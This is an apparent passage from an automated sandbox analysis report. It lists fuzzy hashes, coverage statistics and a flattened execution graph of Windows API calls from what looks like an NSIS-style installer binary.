                                              • Opcode Fuzzy Hash: d184ac91ad0f4e050bf067d041880faadbb7e6de1e43dd3a3f651b7eff22738f
                                              • Instruction Fuzzy Hash: 15D05B7150883127E61137285C06E6E7D04FB13770F344715F13DE55E9EF554C514692

                                              Execution Graph

                                              Execution Coverage:12.3%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:12%
                                              Total number of Nodes:1481
                                              Total number of Limit Nodes:32
                                              execution_graph 4025 402fc0 4026 401446 18 API calls 4025->4026 4027 402fc7 4026->4027 4028 401a13 4027->4028 4029 403017 4027->4029 4030 40300a 4027->4030 4032 406831 18 API calls 4029->4032 4031 401446 18 API calls 4030->4031 4031->4028 4032->4028 4033 4023c1 4034 40145c 18 API calls 4033->4034 4035 4023c8 4034->4035 4038 407296 4035->4038 4041 406efe CreateFileW 4038->4041 4042 406f30 4041->4042 4043 406f4a ReadFile 4041->4043 4044 4062cf 11 API calls 4042->4044 4045 4023d6 4043->4045 4048 406fb0 4043->4048 4044->4045 4046 406fc7 ReadFile lstrcpynA lstrcmpA 4046->4048 4049 40700e SetFilePointer ReadFile 4046->4049 4047 40720f CloseHandle 4047->4045 4048->4045 4048->4046 4048->4047 4050 407009 4048->4050 4049->4047 4051 4070d4 ReadFile 4049->4051 4050->4047 4052 407164 4051->4052 4052->4050 4052->4051 4053 40718b SetFilePointer GlobalAlloc ReadFile 4052->4053 4054 4071eb lstrcpynW GlobalFree 4053->4054 4055 4071cf 4053->4055 4054->4047 4055->4054 4055->4055 4056 401cc3 4057 40145c 18 API calls 4056->4057 4058 401cca lstrlenW 4057->4058 4059 4030dc 4058->4059 4060 4030e3 4059->4060 4062 405f7d wsprintfW 4059->4062 4062->4060 4063 401c46 4064 40145c 18 API calls 4063->4064 4065 401c4c 4064->4065 4066 4062cf 11 API calls 4065->4066 4067 401c59 4066->4067 4068 406cc7 81 API calls 4067->4068 4069 401c64 4068->4069 4070 403049 4071 401446 18 API calls 4070->4071 4072 403050 4071->4072 4073 406831 18 API calls 4072->4073 4074 401a13 4072->4074 4073->4074 4075 40204a 4076 401446 18 API calls 4075->4076 4077 402051 IsWindow 4076->4077 4078 4018d3 4077->4078 4079 40324c 4080 403277 4079->4080 4081 40325e SetTimer 4079->4081 4082 4032cc 4080->4082 4083 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4080->4083 4081->4080 4083->4082 4084 4022cc 4085 40145c 18 API calls 4084->4085 4086 4022d3 4085->4086 4087 406301 2 API calls 4086->4087 4088 4022d9 4087->4088 4090 4022e8 4088->4090 4093 405f7d wsprintfW 4088->4093 4091 4030e3 4090->4091 4094 405f7d wsprintfW 4090->4094 4093->4090 4094->4091 4095 4030cf 4096 40145c 18 API calls 4095->4096 4097 4030d6 4096->4097 4099 4030dc 4097->4099 4102 4063d8 GlobalAlloc lstrlenW 4097->4102 4100 4030e3 4099->4100 4129 405f7d wsprintfW 4099->4129 4103 406460 4102->4103 4104 40640e 4102->4104 4103->4099 4105 40643b GetVersionExW 4104->4105 4130 406057 CharUpperW 4104->4130 4105->4103 4106 40646a 4105->4106 4107 406490 LoadLibraryA 4106->4107 4108 406479 4106->4108 4107->4103 4111 4064ae GetProcAddress GetProcAddress GetProcAddress 4107->4111 4108->4103 4110 4065b1 GlobalFree 4108->4110 4112 4065c7 LoadLibraryA 4110->4112 4113 406709 FreeLibrary 4110->4113 4114 406621 4111->4114 4118 4064d6 4111->4118 4112->4103 4116 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4112->4116 4113->4103 4115 40667d FreeLibrary 4114->4115 4117 406656 4114->4117 4115->4117 4116->4114 4121 406716 4117->4121 4126 4066b1 lstrcmpW 4117->4126 4127 4066e2 CloseHandle 4117->4127 4128 406700 CloseHandle 4117->4128 4118->4114 4119 406516 4118->4119 4120 4064fa FreeLibrary GlobalFree 4118->4120 4119->4110 4122 406528 lstrcpyW OpenProcess 4119->4122 4124 40657b CloseHandle CharUpperW lstrcmpW 4119->4124 4120->4103 4123 40671b CloseHandle FreeLibrary 4121->4123 4122->4119 4122->4124 4125 406730 CloseHandle 4123->4125 4124->4114 4124->4119 4125->4123 4126->4117 4126->4125 4127->4117 4128->4113 4129->4100 4130->4104 4131 4044d1 4132 40450b 4131->4132 4133 40453e 4131->4133 4199 405cb0 GetDlgItemTextW 4132->4199 4134 40454b GetDlgItem GetAsyncKeyState 4133->4134 4138 4045dd 4133->4138 4136 40456a GetDlgItem 4134->4136 4149 404588 4134->4149 4200 403d6b 4136->4200 4137 4046c9 4197 40485f 4137->4197 4204 405cb0 GetDlgItemTextW 4137->4204 4138->4137 4146 406831 18 API calls 4138->4146 4138->4197 4139 404516 4140 406064 5 API calls 4139->4140 4142 40451c 4140->4142 4145 403ea0 5 API calls 4142->4145 4144 40457d ShowWindow 4144->4149 4150 404521 GetDlgItem 4145->4150 4151 40465b SHBrowseForFolderW 4146->4151 4147 4046f5 4152 4067aa 18 API calls 4147->4152 4154 4045a5 SetWindowTextW 4149->4154 4158 405d85 4 API calls 4149->4158 4155 40452f IsDlgButtonChecked 4150->4155 4150->4197 4151->4137 4157 404673 CoTaskMemFree 4151->4157 4162 4046fb 4152->4162 4156 403d6b 19 API calls 4154->4156 4155->4133 4160 4045c3 4156->4160 4161 40674e 3 API calls 4157->4161 4159 40459b 4158->4159 4159->4154 4166 40674e 3 API calls 4159->4166 4163 403d6b 19 API calls 4160->4163 4164 404680 4161->4164 4205 406035 lstrcpynW 4162->4205 4167 4045ce 4163->4167 4168 4046b7 SetDlgItemTextW 4164->4168 4173 406831 18 API calls 4164->4173 4166->4154 4203 403dc4 SendMessageW 4167->4203 4168->4137 4169 404712 4171 406328 3 API calls 4169->4171 4180 40471a 4171->4180 4172 4045d6 4174 406328 3 API calls 4172->4174 4175 40469f lstrcmpiW 4173->4175 4174->4138 4175->4168 4178 4046b0 lstrcatW 4175->4178 4176 40475c 4206 406035 lstrcpynW 4176->4206 4178->4168 4179 404765 4181 405d85 4 API calls 4179->4181 4180->4176 4184 40677d 2 API calls 4180->4184 4186 4047b1 4180->4186 4182 40476b GetDiskFreeSpaceW 4181->4182 4185 40478f MulDiv 4182->4185 4182->4186 4184->4180 4185->4186 4187 40480e 4186->4187 4207 4043d9 4186->4207 4188 404831 4187->4188 4190 40141d 80 API calls 4187->4190 4215 403db1 EnableWindow 4188->4215 4190->4188 4191 4047ff 4193 404810 SetDlgItemTextW 4191->4193 4194 404804 4191->4194 4193->4187 4196 4043d9 21 API calls 4194->4196 4195 40484d 4195->4197 4216 403d8d 4195->4216 4196->4187 4219 403df6 4197->4219 4199->4139 4201 406831 18 API calls 4200->4201 4202 403d76 SetDlgItemTextW 4201->4202 4202->4144 4203->4172 4204->4147 4205->4169 4206->4179 4208 4043f9 4207->4208 4209 406831 18 API calls 4208->4209 4210 404439 4209->4210 4211 406831 18 API calls 4210->4211 4212 404444 4211->4212 4213 406831 18 API calls 4212->4213 4214 404454 lstrlenW wsprintfW SetDlgItemTextW 4213->4214 4214->4191 4215->4195 4217 403da0 SendMessageW 4216->4217 4218 403d9b 4216->4218 4217->4197 4218->4217 4220 403e0b GetWindowLongW 4219->4220 4230 403e94 4219->4230 4221 403e1c 4220->4221 4220->4230 4222 403e2b GetSysColor 4221->4222 4223 403e2e 4221->4223 4222->4223 4224 403e34 SetTextColor 4223->4224 4225 403e3e SetBkMode 4223->4225 4224->4225 4226 403e56 GetSysColor 4225->4226 4227 403e5c 4225->4227 4226->4227 4228 403e63 SetBkColor 4227->4228 4229 403e6d 4227->4229 4228->4229 4229->4230 4231 403e80 DeleteObject 4229->4231 4232 403e87 CreateBrushIndirect 4229->4232 4231->4232 4232->4230 4233 401dd3 4234 401446 18 API calls 4233->4234 4235 401dda 4234->4235 4236 401446 18 API calls 4235->4236 4237 4018d3 4236->4237 4238 402e55 4239 40145c 18 API calls 4238->4239 4240 402e63 4239->4240 4241 402e79 4240->4241 4242 40145c 18 API calls 4240->4242 4243 405e5c 2 API calls 4241->4243 4242->4241 4244 402e7f 4243->4244 4268 405e7c GetFileAttributesW CreateFileW 4244->4268 4246 402e8c 4247 402f35 4246->4247 4248 402e98 GlobalAlloc 4246->4248 4251 4062cf 11 API calls 4247->4251 4249 402eb1 4248->4249 4250 402f2c CloseHandle 4248->4250 4269 403368 SetFilePointer 4249->4269 4250->4247 4253 402f45 4251->4253 4255 402f50 DeleteFileW 4253->4255 4256 402f63 4253->4256 4254 402eb7 4257 403336 ReadFile 4254->4257 4255->4256 4270 401435 4256->4270 4259 402ec0 GlobalAlloc 4257->4259 4260 402ed0 4259->4260 4261 402f04 WriteFile GlobalFree 4259->4261 4263 40337f 33 API calls 4260->4263 4262 40337f 33 API calls 4261->4262 4264 402f29 4262->4264 4267 402edd 4263->4267 4264->4250 4266 402efb GlobalFree 4266->4261 4267->4266 4268->4246 4269->4254 4271 404f9e 25 API calls 4270->4271 4272 401443 4271->4272 4273 401cd5 4274 401446 18 API calls 4273->4274 4275 401cdd 4274->4275 4276 401446 18 API calls 4275->4276 4277 401ce8 4276->4277 4278 40145c 18 API calls 4277->4278 4279 401cf1 4278->4279 4280 401d07 lstrlenW 4279->4280 4281 401d43 4279->4281 4282 401d11 4280->4282 4282->4281 4286 406035 lstrcpynW 4282->4286 4284 401d2c 4284->4281 4285 401d39 lstrlenW 4284->4285 4285->4281 4286->4284 4287 402cd7 4288 401446 18 API calls 4287->4288 4290 402c64 4288->4290 4289 402d17 ReadFile 4289->4290 4290->4287 4290->4289 4291 402d99 4290->4291 4292 402dd8 4293 4030e3 4292->4293 4294 402ddf 4292->4294 4295 402de5 FindClose 4294->4295 4295->4293 4296 401d5c 4297 40145c 18 API calls 4296->4297 4298 401d63 4297->4298 4299 40145c 18 API calls 4298->4299 4300 401d6c 4299->4300 4301 401d73 lstrcmpiW 4300->4301 4302 401d86 lstrcmpW 4300->4302 4303 401d79 4301->4303 4302->4303 4304 401c99 4302->4304 4303->4302 4303->4304 4305 4027e3 4306 4027e9 4305->4306 4307 4027f2 4306->4307 4308 402836 4306->4308 4321 401553 4307->4321 4309 40145c 18 API calls 4308->4309 4311 40283d 4309->4311 4313 4062cf 11 API calls 4311->4313 4312 4027f9 4314 40145c 18 API calls 4312->4314 4318 401a13 4312->4318 4315 40284d 4313->4315 4316 40280a RegDeleteValueW 4314->4316 4325 40149d RegOpenKeyExW 4315->4325 4317 4062cf 11 API calls 4316->4317 4320 40282a RegCloseKey 4317->4320 4320->4318 4322 401563 4321->4322 4323 40145c 18 API calls 4322->4323 4324 401589 RegOpenKeyExW 4323->4324 4324->4312 4328 4014c9 4325->4328 4333 401515 4325->4333 4326 4014ef RegEnumKeyW 4327 401501 RegCloseKey 4326->4327 4326->4328 4330 406328 3 API calls 4327->4330 4328->4326 4328->4327 4329 401526 RegCloseKey 4328->4329 4331 40149d 3 API calls 4328->4331 4329->4333 4332 401511 4330->4332 4331->4328 4332->4333 4334 401541 RegDeleteKeyW 4332->4334 4333->4318 4334->4333 4335 4040e4 4336 4040ff 4335->4336 4342 40422d 4335->4342 4338 40413a 4336->4338 4366 403ff6 WideCharToMultiByte 4336->4366 4337 404298 4339 40436a 4337->4339 4340 4042a2 GetDlgItem 4337->4340 4346 403d6b 19 API calls 4338->4346 4347 403df6 8 API calls 4339->4347 4343 40432b 4340->4343 4344 4042bc 4340->4344 4342->4337 4342->4339 4345 404267 GetDlgItem SendMessageW 4342->4345 4343->4339 4348 40433d 4343->4348 4344->4343 4352 4042e2 6 API calls 4344->4352 4371 403db1 EnableWindow 4345->4371 4350 40417a 4346->4350 4351 404365 4347->4351 4353 404353 4348->4353 4354 404343 SendMessageW 4348->4354 4356 403d6b 19 API calls 4350->4356 4352->4343 4353->4351 4357 404359 SendMessageW 4353->4357 4354->4353 4355 404293 4358 403d8d SendMessageW 4355->4358 4359 404187 CheckDlgButton 4356->4359 4357->4351 4358->4337 4369 403db1 EnableWindow 4359->4369 4361 4041a5 GetDlgItem 4370 403dc4 SendMessageW 4361->4370 4363 4041bb SendMessageW 4364 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4363->4364 4365 4041d8 GetSysColor 4363->4365 4364->4351 4365->4364 4367 404033 4366->4367 4368 404015 GlobalAlloc WideCharToMultiByte 4366->4368 4367->4338 4368->4367 4369->4361 4370->4363 4371->4355 4372 402ae4 4373 402aeb 4372->4373 4374 4030e3 4372->4374 4375 402af2 CloseHandle 4373->4375 4375->4374 4376 402065 4377 401446 18 API calls 4376->4377 4378 40206d 4377->4378 4379 401446 18 API calls 4378->4379 4380 402076 GetDlgItem 4379->4380 4381 4030dc 4380->4381 4382 4030e3 4381->4382 4384 405f7d wsprintfW 4381->4384 4384->4382 4385 402665 4386 40145c 18 API calls 4385->4386 4387 40266b 4386->4387 4388 40145c 18 API calls 4387->4388 4389 402674 4388->4389 4390 40145c 18 API calls 4389->4390 4391 40267d 4390->4391 4392 4062cf 11 API calls 4391->4392 4393 40268c 4392->4393 4394 406301 2 API calls 4393->4394 4395 402695 4394->4395 4396 4026a6 lstrlenW lstrlenW 4395->4396 4398 404f9e 25 API calls 4395->4398 4400 4030e3 4395->4400 4397 404f9e 25 API calls 4396->4397 4399 4026e8 SHFileOperationW 4397->4399 4398->4395 4399->4395 4399->4400 4401 401c69 4402 40145c 18 API calls 4401->4402 4403 401c70 4402->4403 4404 4062cf 11 API calls 4403->4404 4405 401c80 4404->4405 4406 405ccc MessageBoxIndirectW 4405->4406 4407 401a13 4406->4407 4408 402f6e 4409 402f72 4408->4409 4410 402fae 4408->4410 4412 4062cf 11 API calls 4409->4412 4411 40145c 18 API calls 4410->4411 4418 402f9d 4411->4418 4413 402f7d 4412->4413 4414 4062cf 11 API calls 4413->4414 4415 402f90 4414->4415 4416 402fa2 4415->4416 4417 402f98 4415->4417 4420 406113 9 API calls 4416->4420 4419 403ea0 5 API calls 4417->4419 4419->4418 4420->4418 4421 4023f0 4422 402403 4421->4422 4423 4024da 4421->4423 4424 40145c 18 API calls 4422->4424 4425 404f9e 25 API calls 4423->4425 4426 40240a 4424->4426 4429 4024f1 4425->4429 4427 40145c 18 API calls 4426->4427 4428 402413 4427->4428 4430 402429 LoadLibraryExW 4428->4430 4431 40241b GetModuleHandleW 4428->4431 4432 4024ce 4430->4432 4433 40243e 4430->4433 4431->4430 4431->4433 4435 404f9e 25 API calls 4432->4435 4445 406391 GlobalAlloc WideCharToMultiByte 4433->4445 4435->4423 4436 402449 4437 40248c 4436->4437 4438 40244f 4436->4438 4439 404f9e 25 API calls 4437->4439 4440 401435 25 API calls 4438->4440 4443 40245f 4438->4443 4441 402496 4439->4441 4440->4443 4442 4062cf 11 API calls 4441->4442 4442->4443 4443->4429 4444 4024c0 FreeLibrary 4443->4444 4444->4429 4446 4063c9 GlobalFree 4445->4446 4447 4063bc GetProcAddress 4445->4447 4446->4436 4447->4446 4448 402175 4449 401446 18 API calls 4448->4449 4450 40217c 4449->4450 4451 401446 18 API calls 4450->4451 4452 402186 4451->4452 4453 402197 4452->4453 4456 4062cf 11 API calls 4452->4456 4454 4021aa EnableWindow 4453->4454 4455 40219f ShowWindow 4453->4455 4457 4030e3 4454->4457 4455->4457 4456->4453 4458 4048f8 4459 404906 4458->4459 4460 40491d 4458->4460 4461 40490c 4459->4461 4476 404986 4459->4476 4462 40492b IsWindowVisible 4460->4462 4468 404942 4460->4468 4463 403ddb SendMessageW 4461->4463 4465 404938 4462->4465 4462->4476 4466 404916 4463->4466 4464 40498c CallWindowProcW 4464->4466 4477 40487a SendMessageW 4465->4477 4468->4464 4482 406035 lstrcpynW 4468->4482 4470 404971 4483 405f7d wsprintfW 4470->4483 4472 404978 4473 40141d 80 API calls 4472->4473 4474 40497f 4473->4474 4484 406035 lstrcpynW 4474->4484 4476->4464 4478 4048d7 SendMessageW 4477->4478 4479 40489d GetMessagePos ScreenToClient SendMessageW 4477->4479 4481 4048cf 4478->4481 4480 4048d4 4479->4480 4479->4481 4480->4478 4481->4468 4482->4470 4483->4472 4484->4476 4485 4050f9 4486 4052c1 4485->4486 4487 40511a GetDlgItem GetDlgItem GetDlgItem 4485->4487 4488 4052f2 4486->4488 4489 4052ca GetDlgItem CreateThread CloseHandle 4486->4489 4534 403dc4 SendMessageW 4487->4534 4491 405320 4488->4491 4493 405342 4488->4493 4494 40530c ShowWindow ShowWindow 4488->4494 4489->4488 4495 40537e 4491->4495 4497 405331 4491->4497 4498 405357 ShowWindow 4491->4498 4492 40518e 4504 406831 18 API calls 4492->4504 4499 403df6 8 API calls 4493->4499 4536 403dc4 SendMessageW 4494->4536 4495->4493 4500 405389 SendMessageW 4495->4500 4537 403d44 4497->4537 4502 405377 4498->4502 4503 405369 4498->4503 4509 4052ba 4499->4509 4508 4053a2 CreatePopupMenu 4500->4508 4500->4509 4507 403d44 SendMessageW 4502->4507 4505 404f9e 25 API calls 4503->4505 4506 4051ad 4504->4506 4505->4502 4510 4062cf 11 API calls 4506->4510 4507->4495 4511 406831 18 API calls 4508->4511 4512 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4510->4512 4513 4053b2 AppendMenuW 4511->4513 4514 405203 SendMessageW SendMessageW 4512->4514 4515 40521f 4512->4515 4516 4053c5 GetWindowRect 4513->4516 4517 4053d8 4513->4517 4514->4515 4518 405232 4515->4518 4519 405224 SendMessageW 4515->4519 4520 4053df TrackPopupMenu 4516->4520 4517->4520 4521 403d6b 19 API calls 4518->4521 4519->4518 4520->4509 4522 4053fd 4520->4522 4523 405242 4521->4523 4524 405419 SendMessageW 4522->4524 4525 40524b ShowWindow 4523->4525 4526 40527f GetDlgItem SendMessageW 4523->4526 4524->4524 4527 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4524->4527 4528 405261 ShowWindow 4525->4528 4529 40526e 4525->4529 4526->4509 4530 4052a2 SendMessageW SendMessageW 4526->4530 4531 40545b SendMessageW 4527->4531 4528->4529 4535 403dc4 SendMessageW 4529->4535 4530->4509 4531->4531 4532 405486 GlobalUnlock SetClipboardData CloseClipboard 4531->4532 4532->4509 4534->4492 4535->4526 4536->4491 4538 403d51 SendMessageW 4537->4538 4539 403d4b 4537->4539 4538->4493 4539->4538 4540 4020f9 GetDC GetDeviceCaps 4541 401446 18 API calls 4540->4541 4542 402116 MulDiv 4541->4542 4543 401446 18 API calls 4542->4543 4544 40212c 4543->4544 4545 406831 18 API calls 4544->4545 4546 402165 CreateFontIndirectW 4545->4546 4547 4030dc 4546->4547 4548 4030e3 4547->4548 4550 405f7d wsprintfW 4547->4550 4550->4548 4551 4024fb 4552 40145c 18 API calls 4551->4552 4553 402502 4552->4553 4554 40145c 18 API calls 4553->4554 4555 40250c 4554->4555 4556 40145c 18 API calls 4555->4556 4557 402515 4556->4557 4558 40145c 18 API calls 4557->4558 4559 40251f 4558->4559 4560 40145c 18 API calls 4559->4560 4561 402529 4560->4561 4562 40253d 4561->4562 4563 40145c 18 API calls 4561->4563 4564 4062cf 11 API calls 4562->4564 4563->4562 4565 40256a CoCreateInstance 4564->4565 4566 40258c 4565->4566 4567 4026fc 4569 402708 4567->4569 4570 401ee4 4567->4570 4568 406831 18 API calls 4568->4570 4570->4567 4570->4568 4571 4019fd 4572 40145c 18 API calls 4571->4572 4573 401a04 4572->4573 4574 405eab 2 API calls 4573->4574 4575 401a0b 4574->4575 4576 4022fd 4577 40145c 18 API calls 4576->4577 4578 402304 GetFileVersionInfoSizeW 4577->4578 4579 4030e3 4578->4579 4580 40232b GlobalAlloc 4578->4580 4580->4579 4581 40233f GetFileVersionInfoW 4580->4581 4582 402350 VerQueryValueW 4581->4582 4583 402381 GlobalFree 4581->4583 4582->4583 4584 402369 4582->4584 4583->4579 4589 405f7d wsprintfW 4584->4589 4587 402375 4590 405f7d wsprintfW 4587->4590 4589->4587 4590->4583 4591 402afd 4592 40145c 18 API calls 4591->4592 4593 402b04 4592->4593 4598 405e7c GetFileAttributesW CreateFileW 4593->4598 4595 402b10 4596 4030e3 4595->4596 4599 405f7d wsprintfW 4595->4599 4598->4595 4599->4596 4600 4029ff 4601 401553 19 API calls 4600->4601 4602 402a09 4601->4602 4603 40145c 18 API calls 4602->4603 4604 402a12 4603->4604 4605 402a1f RegQueryValueExW 4604->4605 4609 401a13 4604->4609 4606 402a45 4605->4606 4607 402a3f 4605->4607 4608 4029e4 RegCloseKey 4606->4608 4606->4609 4607->4606 4611 405f7d wsprintfW 4607->4611 4608->4609 4611->4606 4612 401000 4613 401037 BeginPaint GetClientRect 4612->4613 4614 40100c DefWindowProcW 4612->4614 4616 4010fc 4613->4616 4617 401182 4614->4617 4618 401073 CreateBrushIndirect FillRect DeleteObject 4616->4618 4619 401105 4616->4619 4618->4616 4620 401170 EndPaint 4619->4620 4621 40110b CreateFontIndirectW 4619->4621 4620->4617 4621->4620 4622 40111b 6 API calls 4621->4622 4622->4620 4623 401f80 4624 401446 18 API calls 4623->4624 4625 401f88 4624->4625 4626 401446 18 API calls 4625->4626 4627 401f93 4626->4627 4628 401fa3 4627->4628 4629 40145c 18 API calls 4627->4629 4630 401fb3 4628->4630 4631 40145c 18 API calls 4628->4631 4629->4628 4632 402006 4630->4632 4633 401fbc 4630->4633 4631->4630 4634 40145c 18 API calls 4632->4634 4635 401446 18 API calls 4633->4635 4636 40200d 4634->4636 4637 401fc4 4635->4637 4639 40145c 18 API calls 4636->4639 4638 401446 18 API calls 4637->4638 4640 401fce 4638->4640 4641 402016 FindWindowExW 4639->4641 4642 401ff6 SendMessageW 4640->4642 4643 401fd8 SendMessageTimeoutW 4640->4643 4645 402036 4641->4645 4642->4645 4643->4645 4644 4030e3 4645->4644 4647 405f7d wsprintfW 4645->4647 4647->4644 4648 402880 4649 402884 4648->4649 4650 40145c 18 API calls 4649->4650 4651 4028a7 4650->4651 4652 40145c 18 API calls 4651->4652 4653 4028b1 4652->4653 4654 4028ba RegCreateKeyExW 4653->4654 4655 4028e8 4654->4655 4660 4029ef 4654->4660 4656 402934 4655->4656 4658 40145c 18 API calls 4655->4658 4657 402963 4656->4657 4659 401446 18 API calls 4656->4659 4661 4029ae RegSetValueExW 4657->4661 4664 40337f 33 API calls 4657->4664 4662 4028fc lstrlenW 4658->4662 4663 402947 4659->4663 4667 4029c6 RegCloseKey 4661->4667 4668 4029cb 4661->4668 4665 402918 4662->4665 4666 40292a 4662->4666 4670 4062cf 11 API calls 4663->4670 4671 40297b 4664->4671 4672 4062cf 11 API calls 4665->4672 4673 4062cf 11 API calls 4666->4673 4667->4660 4669 4062cf 11 API calls 4668->4669 4669->4667 4670->4657 4679 406250 4671->4679 4676 402922 4672->4676 4673->4656 4676->4661 4678 4062cf 11 API calls 4678->4676 4680 406273 4679->4680 4681 4062b6 4680->4681 4682 406288 wsprintfW 4680->4682 4683 402991 4681->4683 4684 4062bf lstrcatW 4681->4684 4682->4681 4682->4682 4683->4678 4684->4683 4685 403d02 4686 403d0d 4685->4686 4687 403d11 4686->4687 4688 403d14 GlobalAlloc 4686->4688 4688->4687 4689 402082 4690 401446 18 API calls 4689->4690 4691 402093 SetWindowLongW 4690->4691 4692 4030e3 4691->4692 4693 402a84 4694 401553 19 API calls 4693->4694 4695 402a8e 4694->4695 4696 401446 18 API calls 4695->4696 4697 402a98 4696->4697 4698 401a13 4697->4698 4699 402ab2 RegEnumKeyW 4697->4699 4700 402abe RegEnumValueW 4697->4700 4701 402a7e 4699->4701 4700->4698 4700->4701 4701->4698 4702 4029e4 RegCloseKey 4701->4702 4702->4698 4703 402c8a 4704 402ca2 4703->4704 4705 402c8f 4703->4705 4707 40145c 18 API calls 4704->4707 4706 401446 18 API calls 4705->4706 4709 402c97 4706->4709 4708 402ca9 lstrlenW 4707->4708 4708->4709 4710 401a13 4709->4710 4711 402ccb WriteFile 4709->4711 4711->4710 4712 401d8e 4713 40145c 18 API calls 4712->4713 4714 401d95 ExpandEnvironmentStringsW 4713->4714 4715 401da8 4714->4715 4716 401db9 4714->4716 4715->4716 4717 401dad lstrcmpW 4715->4717 4717->4716 4718 401e0f 4719 401446 18 API calls 4718->4719 4720 401e17 4719->4720 4721 401446 18 API calls 4720->4721 4722 401e21 4721->4722 4723 4030e3 4722->4723 4725 405f7d wsprintfW 4722->4725 4725->4723 4726 40438f 4727 4043c8 4726->4727 4728 40439f 4726->4728 4729 403df6 8 API calls 4727->4729 4730 403d6b 19 API calls 4728->4730 4732 4043d4 4729->4732 4731 4043ac SetDlgItemTextW 4730->4731 4731->4727 4733 403f90 4734 403fa0 4733->4734 4735 403fbc 4733->4735 4744 405cb0 GetDlgItemTextW 4734->4744 4737 403fc2 SHGetPathFromIDListW 4735->4737 4738 403fef 4735->4738 4740 403fd2 4737->4740 4743 403fd9 SendMessageW 4737->4743 4739 403fad SendMessageW 4739->4735 4741 40141d 80 API calls 4740->4741 4741->4743 4743->4738 4744->4739 4745 402392 4746 40145c 18 API calls 4745->4746 4747 402399 4746->4747 4750 407224 4747->4750 4751 406efe 25 API calls 4750->4751 4752 407244 4751->4752 4753 4023a7 4752->4753 4754 40724e lstrcpynW lstrcmpW 4752->4754 4755 407280 4754->4755 4756 407286 lstrcpynW 4754->4756 4755->4756 4756->4753 4757 402713 4772 406035 lstrcpynW 4757->4772 4759 40272c 4773 406035 lstrcpynW 4759->4773 4761 402738 4762 402743 4761->4762 4763 40145c 18 API calls 4761->4763 4764 40145c 18 API calls 4762->4764 4765 402752 4762->4765 4763->4762 4764->4765 4767 40145c 18 API calls 4765->4767 4769 402761 4765->4769 4766 40145c 18 API calls 4768 40276b 4766->4768 4767->4769 4770 4062cf 11 API calls 4768->4770 4769->4766 4771 40277f WritePrivateProfileStringW 4770->4771 4772->4759 4773->4761 4774 402797 4775 40145c 18 API calls 4774->4775 4776 4027ae 4775->4776 4777 40145c 18 API calls 4776->4777 4778 4027b7 4777->4778 4779 40145c 18 API calls 4778->4779 4780 4027c0 GetPrivateProfileStringW lstrcmpW 4779->4780 4781 401e9a 4782 40145c 18 API calls 4781->4782 4783 401ea1 4782->4783 4784 401446 18 API calls 4783->4784 4785 401eab wsprintfW 4784->4785 3453 401a1f 3454 40145c 18 API calls 3453->3454 3455 401a26 3454->3455 3456 4062cf 11 API calls 3455->3456 3457 401a49 3456->3457 3458 401a64 3457->3458 3459 401a5c 3457->3459 3528 406035 lstrcpynW 3458->3528 3527 406035 lstrcpynW 3459->3527 3462 401a6f 3529 40674e lstrlenW CharPrevW 3462->3529 3463 401a62 3466 406064 5 API calls 3463->3466 3497 401a81 3466->3497 3470 401a98 CompareFileTime 3470->3497 3471 401ba9 3472 404f9e 25 API calls 3471->3472 3474 401bb3 3472->3474 3473 401b5d 3475 404f9e 25 API calls 3473->3475 3506 40337f 3474->3506 3477 401b70 3475->3477 3481 4062cf 11 API calls 3477->3481 3479 406035 lstrcpynW 3479->3497 3480 4062cf 11 API calls 3482 401bda 3480->3482 3486 401b8b 3481->3486 3483 401be9 SetFileTime 3482->3483 3484 401bf8 FindCloseChangeNotification 3482->3484 3483->3484 3484->3486 3487 401c09 3484->3487 3485 406831 18 API calls 3485->3497 3488 401c21 3487->3488 3489 401c0e 3487->3489 3490 406831 18 API calls 3488->3490 3491 406831 18 API calls 3489->3491 3492 401c29 3490->3492 3494 401c16 lstrcatW 3491->3494 3495 4062cf 11 API calls 3492->3495 3494->3492 3498 401c34 3495->3498 3496 401b50 3500 401b93 3496->3500 3501 401b53 3496->3501 3497->3470 3497->3471 3497->3473 3497->3479 3497->3485 3497->3496 3499 4062cf 11 API calls 3497->3499 3505 405e7c GetFileAttributesW CreateFileW 3497->3505 3532 406301 FindFirstFileW 3497->3532 3535 405e5c GetFileAttributesW 3497->3535 3538 405ccc 3497->3538 3502 405ccc MessageBoxIndirectW 3498->3502 3499->3497 3503 4062cf 11 API calls 3500->3503 3504 4062cf 11 API calls 3501->3504 3502->3486 3503->3486 3504->3473 3505->3497 3507 40339a 3506->3507 3508 4033c7 3507->3508 3544 403368 SetFilePointer 3507->3544 3542 403336 ReadFile 3508->3542 3512 401bc6 3512->3480 3513 403546 3515 40354a 3513->3515 3516 40356e 3513->3516 3514 4033eb GetTickCount 3514->3512 3519 403438 3514->3519 3517 403336 ReadFile 3515->3517 3516->3512 3520 403336 ReadFile 3516->3520 3521 40358d WriteFile 3516->3521 3517->3512 3518 403336 ReadFile 3518->3519 3519->3512 3519->3518 3523 40348a GetTickCount 3519->3523 3524 4034af MulDiv wsprintfW 3519->3524 3526 4034f3 WriteFile 3519->3526 3520->3516 3521->3512 3522 4035a1 3521->3522 3522->3512 3522->3516 3523->3519 3525 404f9e 25 API calls 3524->3525 3525->3519 3526->3512 3526->3519 3527->3463 3528->3462 3530 401a75 lstrcatW 3529->3530 3531 40676b lstrcatW 3529->3531 3530->3463 3531->3530 3533 406322 3532->3533 3534 406317 FindClose 3532->3534 3533->3497 3534->3533 3536 405e79 3535->3536 3537 405e6b SetFileAttributesW 3535->3537 3536->3497 3537->3536 3539 405ce1 3538->3539 3540 405d2f 3539->3540 3541 405cf7 MessageBoxIndirectW 3539->3541 3540->3497 3541->3540 3543 403357 3542->3543 3543->3512 3543->3513 3543->3514 3544->3508 4786 40209f GetDlgItem GetClientRect 4787 40145c 18 API calls 4786->4787 4788 4020cf LoadImageW SendMessageW 4787->4788 4789 4030e3 4788->4789 4790 4020ed DeleteObject 4788->4790 4790->4789 4791 402b9f 4792 401446 18 API calls 4791->4792 4796 402ba7 4792->4796 4793 402c4a 4794 402bdf ReadFile 4794->4796 4803 402c3d 4794->4803 4795 401446 18 API calls 4795->4803 4796->4793 4796->4794 4797 402c06 MultiByteToWideChar 4796->4797 4798 402c3f 4796->4798 4799 402c4f 4796->4799 4796->4803 